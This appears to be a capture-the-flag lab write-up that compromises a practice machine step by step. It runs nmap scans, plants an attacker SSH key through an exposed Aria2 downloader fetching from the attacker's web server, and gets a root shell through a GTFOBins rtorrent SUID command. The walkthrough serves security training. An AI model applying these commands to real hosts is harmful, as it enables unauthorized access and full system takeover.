When the machine starts, it displays its IP address; in this case, it is 192.168.18.190.
The victim machine's IP address
To begin, we will perform a scan using the NMAP tool, which will help us identify open ports on the target machine. First, we will use the following command for a quick scan that informs us about the open ports. We will scan all ports (65535) without depth.
sudo nmap -sS -p- --min-rate 4500 -n -Pn 192.168.18.190
And now, with the open ports identified, we will perform a more detailed scan:
nmap -sCV -p22,80,6800 -n -Pn 192.168.18.190 -oN target
We observe that port 6800 is running Aria2, which is an open-source downloader that supports various protocols such as HTTP, FTP, BitTorrent.
By accessing port 80, we obtain the username Carolina.
User carolina
Next, we notice that by selecting ‘By URLs’ within ‘Add’, we can upload files to any directory. So, I am going to copy my id_rsa.pub to a file named authorized_keys and upload it, allowing the victim machine to recognize our machine as authorized, specifically as the user Carolina.
cp id_rsa.pub authorized_keys
If you don’t have the id_rsa.pub file, you can create it with the following command:
ssh-keygen
And with Python, we start a web server on port 8080:
python3 -m http.server 8080
Now, we put the URL where our file is located and change the destination directory to /home/carolina/.ssh.
We send it, and now we can access via port 22 (SSH) as the user carolina.
We are now Carolina
Let’s check how many users are on the machine. It appears that there are only two users: carolina and root.
grep /bin/bash /etc/passwd
User on the machine
We get the user flag, and now it’s time to move on to privilege escalation.
Privilege escalation to Root
We enumerate the SUID binaries on the machine, and there is one that we can use to escalate to root very easily. The relevant binary is rtorrent.
We search in GTFObins, and it provides a way to escalate to root using this SUID binary by running the following command:
Command for privilege escalation
echo "execute = /bin/sh,-p,-c,\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
/usr/bin/rtorrent
We are root
Now that we have root access, let’s grab the root flag and complete the machine
